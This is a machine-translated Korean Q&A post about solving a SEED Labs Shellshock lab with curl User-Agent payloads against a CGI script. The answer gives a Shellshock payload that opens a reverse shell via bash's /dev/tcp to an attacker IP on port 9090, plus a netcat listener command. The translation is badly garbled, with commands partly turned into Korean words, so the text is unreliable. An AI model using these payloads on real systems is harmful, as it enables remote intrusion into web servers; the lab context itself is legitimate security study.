에이전트 필드가 설정되었지만 쉘 쇼크의 기능을 실행하지 않습니다.

Question

시드 랩 셸 쇼크 취약점 랩을 해결하려고합니다. 벨로우즈 명령으로 에이전트 필드를 설정하려고합니다. 컬 - A "() {echo hello;}; Content_type : 텍스트/일반, 에코 ​​/ 빈/LS -l "http://localhost/cgi-bin/sample.cgi

넣어 밖으로는 아직도 내가 환경 변수를 확인하여 에이전트 필드 테스트 CGI 스크립트

내부에 배치 헬로 단어입니다. 그것은 내 명령으로 설정되었지만 실행되지 않았습니까? bash가이 기능을 구문 분석하지 못했던 이유에 대한 제안 미리 감사드립니다.

Answer 1

마침내 대답이 잘못되었습니다. 잘못된 구문 때문이었습니다. 올바른 구문은 다음과 같습니다. Curl -A '() {:;}; Content_type : 텍스트/일반; 에코;/bin/ls -l ' 역 껍질 얻기를위한 bash 명령을 실행하는 경우 다음과 같습니다 : Curl -A'() {:;}; $ (/ 빈/bash는 -i>는/dev/TCP/IP 주소 만/9090 2> & 1 0> & 1 '

http://yourwebsiteadrress/cgi-bin/your

가 9090을 청취 할 기계를 만들기 위해 잊지 마세요 CGI 파일 먼저로, 물론 그런 -v

9090 -l NC 새 터미널

에서 당신은 역 쉘이